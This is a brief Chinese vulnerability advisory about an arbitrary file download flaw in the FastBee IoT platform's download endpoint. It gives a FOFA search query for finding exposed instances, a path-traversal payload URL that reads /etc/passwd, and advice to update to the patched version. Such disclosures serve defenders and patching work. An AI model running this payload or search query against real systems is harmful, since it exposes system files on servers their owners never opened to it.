fastbee物联网管理系统download接口任意文件下载漏洞

免责申明

本文章仅供学习与交流，请勿用于非法用途，均由使用者本人负责，文章作者不为此承担任何责任

搜索语法

fofa

icon_hash="-307138793" && title=="FastBee物联网系统"

漏洞描述

FastBee是一个开源物联网平台，旨在简化物联网设备的连接与管理。它提供了灵活的架构和丰富的API，支持多种通信协议，使开发者能够快速构建和部署物联网应用。
在download接口中可以读取任意文件并下载

漏洞复现

payload

http://ip/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd

修复建议

官方已经发布补丁，更新到最新版本